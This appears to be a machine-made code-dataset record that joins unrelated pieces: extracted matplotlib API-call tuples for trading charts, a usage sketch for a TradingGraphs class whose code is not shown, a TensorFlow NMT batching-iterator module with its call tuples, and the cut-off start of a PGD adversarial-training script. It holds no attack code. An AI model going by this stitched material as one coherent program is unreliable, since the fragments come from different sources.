'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (7197, 7208), True, 'import matplotlib.pyplot as plt\n'), ((7217, 7240), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (7227, 7240), True, 'import matplotlib.pyplot as 
plt\n'), ((8684, 8728), 'matplotlib.pyplot.plot', 'plt.plot', (["self.df['close']"], {'label': '"""original"""'}), "(self.df['close'], label='original')\n", (8692, 8728), True, 'import matplotlib.pyplot as plt\n'), ((8737, 8788), 'matplotlib.pyplot.plot', 'plt.plot', (['fittedValues'], {'color': '"""red"""', 'label': '"""fitted"""'}), "(fittedValues, color='red', label='fitted')\n", (8745, 8788), True, 'import matplotlib.pyplot as plt\n'), ((8870, 8882), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (8880, 8882), True, 'import matplotlib.pyplot as plt\n'), ((8891, 8910), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (8901, 8910), True, 'import matplotlib.pyplot as plt\n'), ((8919, 8942), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (8929, 8942), True, 'import matplotlib.pyplot as plt\n'), ((8951, 8969), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (8967, 8969), True, 'import matplotlib.pyplot as plt\n'), ((9685, 9715), 'pandas.DataFrame', 'pd.DataFrame', (["self.df['close']"], {}), "(self.df['close'])\n", (9697, 9715), True, 'import pandas as pd\n'), ((9923, 9957), 'matplotlib.pyplot.plot', 'plt.plot', (['pred'], {'label': '"""prediction"""'}), "(pred, label='prediction')\n", (9931, 9957), True, 'import matplotlib.pyplot as plt\n'), ((9966, 9985), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (9976, 9985), True, 'import matplotlib.pyplot as plt\n'), ((9994, 10012), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Days"""'], {}), "('Days')\n", (10004, 10012), True, 'import matplotlib.pyplot as plt\n'), ((10021, 10044), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (10031, 10044), True, 'import matplotlib.pyplot as plt\n'), ((10053, 10071), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (10069, 10071), True, 'import matplotlib.pyplot as plt\n'), ((10626, 10642), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (10637, 10642), True, 'import matplotlib.pyplot as plt\n'), ((10651, 10689), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""'}), "(self.df.close, label='price')\n", (10659, 10689), True, 'import matplotlib.pyplot as plt\n'), ((10698, 10736), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.sma20'], {'label': '"""sma20"""'}), "(self.df.sma20, label='sma20')\n", (10706, 10736), True, 'import matplotlib.pyplot as plt\n'), ((10745, 10783), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.sma50'], {'label': '"""sma50"""'}), "(self.df.sma50, label='sma50')\n", (10753, 10783), True, 'import matplotlib.pyplot as plt\n'), ((10792, 10832), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.sma200'], {'label': '"""sma200"""'}), "(self.df.sma200, label='sma200')\n", (10800, 10832), True, 'import matplotlib.pyplot as plt\n'), ((10841, 10853), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (10851, 10853), True, 'import matplotlib.pyplot as plt\n'), ((10862, 10881), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (10872, 10881), True, 'import matplotlib.pyplot as plt\n'), ((10890, 10913), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (10900, 10913), True, 'import matplotlib.pyplot as plt\n'), ((10922, 10950), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {'sharex': 'ax1'}), '(212, sharex=ax1)\n', (10933, 10950), True, 'import 
matplotlib.pyplot as plt\n'), ((10959, 10995), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.macd'], {'label': '"""macd"""'}), "(self.df.macd, label='macd')\n", (10967, 10995), True, 'import matplotlib.pyplot as plt\n'), ((11004, 11044), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.signal'], {'label': '"""signal"""'}), "(self.df.signal, label='signal')\n", (11012, 11044), True, 'import matplotlib.pyplot as plt\n'), ((11053, 11065), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (11063, 11065), True, 'import matplotlib.pyplot as plt\n'), ((11074, 11093), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (11084, 11093), True, 'import matplotlib.pyplot as plt\n'), ((11102, 11120), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Days"""'], {}), "('Days')\n", (11112, 11120), True, 'import matplotlib.pyplot as plt\n'), ((11129, 11152), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (11139, 11152), True, 'import matplotlib.pyplot as plt\n'), ((11161, 11179), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11177, 11179), True, 'import matplotlib.pyplot as plt\n'), ((11748, 11786), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': '(1)', 'figsize': '(12, 6)'}), '(ncols=1, figsize=(12, 6))\n', (11760, 11786), True, 'import matplotlib.pyplot as plt\n'), ((11862, 11878), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (11873, 11878), True, 'import matplotlib.pyplot as plt\n'), ((11986, 12010), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (11999, 12010), True, 'import matplotlib.pyplot as plt\n'), ((12019, 12081), 'matplotlib.pyplot.plot', 'plt.plot', (["df_subset['close']"], {'label': '"""price"""', 'color': '"""royalblue"""'}), "(df_subset['close'], label='price', color='royalblue')\n", (12027, 12081), True, 'import matplotlib.pyplot as plt\n'), ((12090, 12149), 'matplotlib.pyplot.plot', 'plt.plot', (["df_subset['ema12']"], {'label': '"""ema12"""', 'color': '"""orange"""'}), "(df_subset['ema12'], label='ema12', color='orange')\n", (12098, 12149), True, 'import matplotlib.pyplot as plt\n'), ((12158, 12217), 'matplotlib.pyplot.plot', 'plt.plot', (["df_subset['ema26']"], {'label': '"""ema26"""', 'color': '"""purple"""'}), "(df_subset['ema26'], label='ema26', color='purple')\n", (12166, 12217), True, 'import matplotlib.pyplot as plt\n'), ((12227, 12314), 'matplotlib.pyplot.tick_params', 'plt.tick_params', ([], {'axis': '"""x"""', 'which': '"""both"""', 'bottom': '(False)', 'top': '(False)', 'labelbottom': '(False)'}), "(axis='x', which='both', bottom=False, top=False,\n labelbottom=False)\n", (12242, 12314), True, 'import matplotlib.pyplot as plt\n'), ((15911, 15930), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (15921, 15930), True, 'import matplotlib.pyplot as plt\n'), ((15939, 15962), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (15949, 15962), True, 'import matplotlib.pyplot as plt\n'), ((15971, 15989), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (15987, 15989), True, 'import matplotlib.pyplot as plt\n'), ((15998, 16010), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (16008, 16010), True, 'import matplotlib.pyplot as plt\n'), ((16092, 16102), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (16100, 16102), True, 'import matplotlib.pyplot as plt\n'), ((1955, 1988), 
'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""green"""'}), "(x=idx, color='green')\n", (1966, 1988), True, 'import matplotlib.pyplot as plt\n'), ((2049, 2080), 'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""red"""'}), "(x=idx, color='red')\n", (2060, 2080), True, 'import matplotlib.pyplot as plt\n'), ((2372, 2382), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2380, 2382), True, 'import matplotlib.pyplot as plt\n'), ((4425, 4435), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4433, 4435), True, 'import matplotlib.pyplot as plt\n'), ((5236, 5246), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5244, 5246), True, 'import matplotlib.pyplot as plt\n'), ((5707, 5741), 'matplotlib.pyplot.axhline', 'plt.axhline', ([], {'y': 'level', 'color': '"""grey"""'}), "(y=level, color='grey')\n", (5718, 5741), True, 'import matplotlib.pyplot as plt\n'), ((6012, 6022), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6020, 6022), True, 'import matplotlib.pyplot as plt\n'), ((7588, 7621), 'matplotlib.ticker.FuncFormatter', 'ticker.FuncFormatter', (['format_date'], {}), '(format_date)\n', (7608, 7621), True, 'import matplotlib.ticker as ticker\n'), ((7907, 7940), 'matplotlib.ticker.FuncFormatter', 'ticker.FuncFormatter', (['format_date'], {}), '(format_date)\n', (7927, 7940), True, 'import matplotlib.ticker as ticker\n'), ((8268, 8278), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8276, 8278), True, 'import matplotlib.pyplot as plt\n'), ((9180, 9190), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9188, 9190), True, 'import matplotlib.pyplot as plt\n'), ((9791, 9820), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': 'days'}), '(days=days)\n', (9809, 9820), False, 'import datetime, re, sys\n'), ((10282, 10292), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10290, 10292), True, 'import matplotlib.pyplot as plt\n'), ((11390, 11400), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11398, 11400), True, 'import matplotlib.pyplot as plt\n'), ((12827, 12889), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""gx"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'gx')\n", (12835, 12889), True, 'import matplotlib.pyplot as plt\n'), ((13131, 13193), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""rx"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'rx')\n", (13139, 13193), True, 'import matplotlib.pyplot as plt\n'), ((13435, 13497), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""g^"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'g^')\n", (13443, 13497), True, 'import matplotlib.pyplot as plt\n'), ((13729, 13791), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""rv"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'rv')\n", (13737, 13791), True, 'import matplotlib.pyplot as plt\n'), ((14027, 14089), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""go"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'go')\n", (14035, 14089), True, 'import matplotlib.pyplot as plt\n'), ((14328, 14390), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""r*"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'r*')\n", (14336, 14390), True, 'import 
matplotlib.pyplot as plt\n'), ((14621, 14683), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""yd"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'yd')\n", (14629, 14683), True, 'import matplotlib.pyplot as plt\n'), ((14927, 14989), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""y^"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'y^')\n", (14935, 14989), True, 'import matplotlib.pyplot as plt\n'), ((15233, 15295), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""yv"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'yv')\n", (15241, 15295), True, 'import matplotlib.pyplot as plt\n'), ((15534, 15596), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""mv"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'mv')\n", (15542, 15596), True, 'import matplotlib.pyplot as plt\n'), ((15837, 15899), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""m^"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'm^')\n", (15845, 15899), True, 'import matplotlib.pyplot as plt\n'), ((16052, 16074), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outputpng'], {}), '(outputpng)\n', (16063, 16074), True, 'import matplotlib.pyplot as plt\n'), ((2223, 2244), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (2234, 2244), True, 'import matplotlib.pyplot as plt\n'), ((3669, 3702), 'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""green"""'}), "(x=idx, color='green')\n", (3680, 3702), True, 'import matplotlib.pyplot as plt\n'), ((4276, 4297), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (4287, 4297), True, 'import matplotlib.pyplot as plt\n'), ((5087, 5108), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (5098, 5108), True, 'import matplotlib.pyplot as plt\n'), ((5863, 5884), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (5874, 5884), True, 'import matplotlib.pyplot as plt\n'), ((6624, 6655), 'pandas.to_datetime', 'pd.to_datetime', (['df_subset.index'], {}), '(df_subset.index)\n', (6638, 6655), True, 'import pandas as pd\n'), ((8119, 8140), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (8130, 8140), True, 'import matplotlib.pyplot as plt\n'), ((9031, 9052), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (9042, 9052), True, 'import matplotlib.pyplot as plt\n'), ((10133, 10154), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (10144, 10154), True, 'import matplotlib.pyplot as plt\n'), ((11241, 11262), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (11252, 11262), True, 'import matplotlib.pyplot as plt\n'), ((12731, 12754), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (12737, 12754), True, 'import numpy as np\n'), ((13035, 13058), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13041, 13058), True, 'import numpy as np\n'), ((13339, 13362), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13345, 13362), True, 'import numpy as np\n'), ((13633, 13656), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13639, 13656), True, 'import numpy as np\n'), ((13931, 
13954), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13937, 13954), True, 'import numpy as np\n'), ((14232, 14255), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (14238, 14255), True, 'import numpy as np\n'), ((14525, 14548), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (14531, 14548), True, 'import numpy as np\n'), ((14831, 14854), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (14837, 14854), True, 'import numpy as np\n'), ((15137, 15160), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (15143, 15160), True, 'import numpy as np\n'), ((15438, 15461), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (15444, 15461), True, 'import numpy as np\n'), ((15741, 15764), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (15747, 15764), True, 'import numpy as np\n'), ((3849, 3880), 'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""red"""'}), "(x=idx, color='red')\n", (3860, 3880), True, 'import matplotlib.pyplot as plt\n')]
|
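A hedged usage sketch for the TradingGraphs class above. Only the TradingGraphs calls are taken from the code; how the TechnicalAnalysis instance is built (its constructor arguments and the step that computes the indicator columns) is an assumption and would need to match models.Trading.

```python
# Hedged sketch: the TechnicalAnalysis constructor and addAll() call are
# assumptions about models.Trading; the TradingGraphs calls come from the class
# above and expect df columns such as close, ema12, ema26, macd and signal.
import pandas as pd
from models.Trading import TechnicalAnalysis

df = pd.read_csv('ohlcv.csv', index_col=0, parse_dates=True)  # hypothetical OHLCV price data
ta = TechnicalAnalysis(df)   # assumed constructor signature
ta.addAll()                  # assumed helper that adds the EMA/MACD/OBV columns
graphs = TradingGraphs(ta)
graphs.renderBuySellSignalEMA1226(saveFile='ema_signals.png', saveOnly=True)
graphs.renderPriceSupportResistance(saveFile='levels.png', saveOnly=True)
```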
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""For loading data into NMT models."""
# tp423 - Added comments
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import tensorflow as tf
__all__ = ["BatchedInput", "get_iterator", "get_infer_iterator"]
# NOTE(ebrevdo): When we subclass this, instances' __dict__ becomes empty.
# Acts as an interface from Java, used for checking classes.
class BatchedInput(collections.namedtuple("BatchedInput",
("initializer",
"source",
"target_input",
"target_output",
"source_sequence_length",
"target_sequence_length"))):
pass
def get_infer_iterator(dataset, vocab_table, batch_size, src_reverse,
eos, src_max_len):
"""
Returns an iterator for the inference graph which does not contain target data.
We do not use buckets for inference.
:param dataset: Data which we'll be working with.
:param vocab_table: Word to index mappings in the form of a tf HashTable.
:param batch_size: The number of consecutive elements of this dataset to combine in a single batch.
:param src_reverse: Whether to reverse the inputs (makes the beginning of the input
have a bigger impact on the response).
:param eos: The end of sentence string
:param src_max_len: Maximum accepted length. Bigger inputs will be truncated.
"""
# Get the id for the eos token. We will use this to pad the data
eos_id = tf.cast(vocab_table.lookup(tf.constant(eos)), tf.int32)
# Tokenize the input data by applying split. For better tokenization data is expected to
# be tokenized in the preprocessing phase.
dataset = dataset.map(lambda line: tf.string_split([line]).values)
if src_max_len:
dataset = dataset.map(lambda line: line[:src_max_len])
# This map converts a vector of strings to a vector of integers
dataset = dataset.map(lambda line: tf.cast(vocab_table.lookup(line), tf.int32))
if src_reverse:
dataset = dataset.map(lambda line: tf.reverse(line, axis=[0]))
# Add in the word counts for each line.
dataset = dataset.map(lambda line: (line, tf.size(line)))
def batching_func(x):
return x.padded_batch(
batch_size,
# The entry is the source line rows;
# this has unknown-length vectors. The last entry is
# the source row size; this is a scalar.
padded_shapes=(tf.TensorShape([None]), # src
tf.TensorShape([])), # src_len
# Pad the source sequences with eos tokens.
# (Though notice we don't generally need to do this since
# later on we will be masking out calculations past the true sequence.)
padding_values=(eos_id, # src
0)) # src_len -- unused
batched_dataset = batching_func(dataset)
batched_iter = batched_dataset.make_initializable_iterator()
(ids, seq_length) = batched_iter.get_next()
return BatchedInput(
initializer=batched_iter.initializer,
source=ids,
target_input=None,
target_output=None,
source_sequence_length=seq_length,
target_sequence_length=None
)
def get_iterator(src_dataset,
tgt_dataset,
vocab_table,
batch_size,
sos,
eos,
src_reverse,
random_seed,
num_buckets,
src_max_len=None,
tgt_max_len=None,
num_threads=4,
output_buffer_size=None,
skip_count=None):
"""
Create iterator for the training or evaluation graph.
:param sos: The 'start of string' string.
:param eos: The 'end of string' string
:param src_reverse: Whether to reverse the input.
:param random_seed: Seed used to fuel a pseudo-random number generator.
:param num_threads: The number of threads to use for processing elements in parallel.
:param output_buffer_size: The number of elements from this dataset from which the new dataset will sample
:param skip_count: The number of elements of this dataset that should be skipped to form the new dataset.
"""
if not output_buffer_size:
output_buffer_size = batch_size * 1000
sos_id = tf.cast(vocab_table.lookup(tf.constant(sos)), tf.int32)
eos_id = tf.cast(vocab_table.lookup(tf.constant(eos)), tf.int32)
dataset = tf.contrib.data.Dataset.zip((src_dataset, tgt_dataset))
# Skip the first skip_count elements.
if skip_count is not None:
dataset = dataset.skip(count=skip_count)
# Shuffle the dataset.
dataset = dataset.shuffle(output_buffer_size, random_seed)
# Split the lines into tokens.
dataset = dataset.map(lambda src, tgt: (tf.string_split([src]).values, tf.string_split([tgt]).values),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Filter zero length input sequences
dataset = dataset.filter(lambda src, tgt: tf.logical_and(tf.size(src) > 0, tf.size(tgt) > 0))
if src_max_len:
dataset = dataset.map(lambda src, tgt: (src[:src_max_len], tgt),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
if tgt_max_len:
dataset = dataset.map(lambda src, tgt: (src, tgt[:tgt_max_len]),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
if src_reverse:
dataset = dataset.map(lambda src, tgt: (tf.reverse(src, axis=0), tgt),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Convert the word strings to ids. Word strings that are not in the
# vocab get the lookup table's default_value integer.
dataset = dataset.map(lambda src, tgt: (tf.cast(vocab_table.lookup(src), tf.int32),
tf.cast(vocab_table.lookup(tgt), tf.int32)),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Create a tgt_input prefixed with <sos> and a tgt_output suffixed with <eos>.
dataset = dataset.map(lambda src, tgt: (src,
tf.concat(([sos_id], tgt), axis=0), # target input
tf.concat((tgt, [eos_id]), axis=0)), # target output, the input shifted
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Add in the word counts. (Subtracting one from the target length to avoid counting
# the target_input <sos> tag, resp. the target_output <eos> tag, has not been done here.)
dataset = dataset.map(lambda src, tgt_in, tgt_out: (src, tgt_in, tgt_out,
tf.size(src), tf.size(tgt_in)),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Bucket by source sequence length (buckets for lengths 0-9, 10-19, ...)
def batching_func(x):
return x.padded_batch(
batch_size,
# The first three entries are the source and target line rows;
# these have unknown-length vectors. The last two entries are
# the source and target row sizes; these are scalars.
padded_shapes=(tf.TensorShape([None]), # src
tf.TensorShape([None]), # tgt_input
tf.TensorShape([None]), # tgt_output
tf.TensorShape([]), # src_len
tf.TensorShape([])), # tgt_len
# Pad the source and target sequences with eos tokens.
# (Though notice we don't generally need to do this since
# later on we will be masking out calculations past the true sequence.)
padding_values=(eos_id, # src
eos_id, # tgt_input
eos_id, # tgt_output
0, # src_len -- unused
0)) # tgt_len -- unused
if num_buckets > 1:
def key_func(unused_1, unused_2, unused_3, src_len, tgt_len):
# Pairs with length [0, bucket_width) go to bucket 0, length
# [bucket_width, 2 * bucket_width) go to bucket 1, etc. Pairs with length
# over ((num_bucket-1) * bucket_width) words all go into the last bucket.
# If there is a max length find the width so that we equally split data in buckets.
# Calculate bucket_width by maximum source sequence length.
if src_max_len:
bucket_width = (src_max_len + num_buckets - 1) // num_buckets
else:
bucket_width = 10
# Bucket sentence pairs by the length of their source sentence and target
# sentence.
bucket_id = tf.maximum(src_len // bucket_width, tgt_len // bucket_width)
return tf.to_int64(tf.minimum(num_buckets, bucket_id))
def reduce_func(unused_key, windowed_data):
return batching_func(windowed_data)
# Maps each consecutive elements in this dataset to a key using key_func to at
# most window_size elements matching the same key.
batched_dataset = dataset.group_by_window(
key_func=key_func, reduce_func=reduce_func, window_size=batch_size
)
else:
batched_dataset = batching_func(dataset)
batched_iter = batched_dataset.make_initializable_iterator()
# Get a sample of what the data looks like.
(src_ids, tgt_input_ids, tgt_output_ids, src_seq_len, tgt_seq_len) = (
batched_iter.get_next())
return BatchedInput(
initializer=batched_iter.initializer,
source=src_ids,
target_input=tgt_input_ids,
target_output=tgt_output_ids,
source_sequence_length=src_seq_len, # Vector containing the sizes of the sequences without padding.
target_sequence_length=tgt_seq_len)
|
[
"tensorflow.reverse",
"tensorflow.size",
"tensorflow.maximum",
"tensorflow.contrib.data.Dataset.zip",
"tensorflow.concat",
"tensorflow.constant",
"tensorflow.string_split",
"tensorflow.minimum",
"tensorflow.TensorShape",
"collections.namedtuple"
] |
[((1123, 1281), 'collections.namedtuple', 'collections.namedtuple', (['"""BatchedInput"""', "('initializer', 'source', 'target_input', 'target_output',\n 'source_sequence_length', 'target_sequence_length')"], {}), "('BatchedInput', ('initializer', 'source',\n 'target_input', 'target_output', 'source_sequence_length',\n 'target_sequence_length'))\n", (1145, 1281), False, 'import collections\n'), ((5417, 5472), 'tensorflow.contrib.data.Dataset.zip', 'tf.contrib.data.Dataset.zip', (['(src_dataset, tgt_dataset)'], {}), '((src_dataset, tgt_dataset))\n', (5444, 5472), True, 'import tensorflow as tf\n'), ((2413, 2429), 'tensorflow.constant', 'tf.constant', (['eos'], {}), '(eos)\n', (2424, 2429), True, 'import tensorflow as tf\n'), ((5304, 5320), 'tensorflow.constant', 'tf.constant', (['sos'], {}), '(sos)\n', (5315, 5320), True, 'import tensorflow as tf\n'), ((5373, 5389), 'tensorflow.constant', 'tf.constant', (['eos'], {}), '(eos)\n', (5384, 5389), True, 'import tensorflow as tf\n'), ((10024, 10084), 'tensorflow.maximum', 'tf.maximum', (['(src_len // bucket_width)', '(tgt_len // bucket_width)'], {}), '(src_len // bucket_width, tgt_len // bucket_width)\n', (10034, 10084), True, 'import tensorflow as tf\n'), ((2621, 2644), 'tensorflow.string_split', 'tf.string_split', (['[line]'], {}), '([line])\n', (2636, 2644), True, 'import tensorflow as tf\n'), ((2952, 2978), 'tensorflow.reverse', 'tf.reverse', (['line'], {'axis': '[0]'}), '(line, axis=[0])\n', (2962, 2978), True, 'import tensorflow as tf\n'), ((3070, 3083), 'tensorflow.size', 'tf.size', (['line'], {}), '(line)\n', (3077, 3083), True, 'import tensorflow as tf\n'), ((7342, 7376), 'tensorflow.concat', 'tf.concat', (['([sos_id], tgt)'], {'axis': '(0)'}), '(([sos_id], tgt), axis=0)\n', (7351, 7376), True, 'import tensorflow as tf\n'), ((7439, 7473), 'tensorflow.concat', 'tf.concat', (['(tgt, [eos_id])'], {'axis': '(0)'}), '((tgt, [eos_id]), axis=0)\n', (7448, 7473), True, 'import tensorflow as tf\n'), ((7928, 7940), 'tensorflow.size', 'tf.size', (['src'], {}), '(src)\n', (7935, 7940), True, 'import tensorflow as tf\n'), ((7942, 7957), 'tensorflow.size', 'tf.size', (['tgt_in'], {}), '(tgt_in)\n', (7949, 7957), True, 'import tensorflow as tf\n'), ((10116, 10150), 'tensorflow.minimum', 'tf.minimum', (['num_buckets', 'bucket_id'], {}), '(num_buckets, bucket_id)\n', (10126, 10150), True, 'import tensorflow as tf\n'), ((3363, 3385), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (3377, 3385), True, 'import tensorflow as tf\n'), ((3421, 3439), 'tensorflow.TensorShape', 'tf.TensorShape', (['[]'], {}), '([])\n', (3435, 3439), True, 'import tensorflow as tf\n'), ((5764, 5786), 'tensorflow.string_split', 'tf.string_split', (['[src]'], {}), '([src])\n', (5779, 5786), True, 'import tensorflow as tf\n'), ((5795, 5817), 'tensorflow.string_split', 'tf.string_split', (['[tgt]'], {}), '([tgt])\n', (5810, 5817), True, 'import tensorflow as tf\n'), ((6046, 6058), 'tensorflow.size', 'tf.size', (['src'], {}), '(src)\n', (6053, 6058), True, 'import tensorflow as tf\n'), ((6064, 6076), 'tensorflow.size', 'tf.size', (['tgt'], {}), '(tgt)\n', (6071, 6076), True, 'import tensorflow as tf\n'), ((6586, 6609), 'tensorflow.reverse', 'tf.reverse', (['src'], {'axis': '(0)'}), '(src, axis=0)\n', (6596, 6609), True, 'import tensorflow as tf\n'), ((8478, 8500), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8492, 8500), True, 'import tensorflow as tf\n'), ((8536, 8558), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], 
{}), '([None])\n', (8550, 8558), True, 'import tensorflow as tf\n'), ((8600, 8622), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8614, 8622), True, 'import tensorflow as tf\n'), ((8665, 8683), 'tensorflow.TensorShape', 'tf.TensorShape', (['[]'], {}), '([])\n', (8679, 8683), True, 'import tensorflow as tf\n'), ((8723, 8741), 'tensorflow.TensorShape', 'tf.TensorShape', (['[]'], {}), '([])\n', (8737, 8741), True, 'import tensorflow as tf\n')]
|
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
import argparse
import os
import os.path as osp
from pprint import pprint
from train import train_model
from model import WideResNet
from attacker import AttackerModel
def main():
parser = argparse.ArgumentParser(description='PGD based adversarial training')
args = parser.parse_args()
# Model options
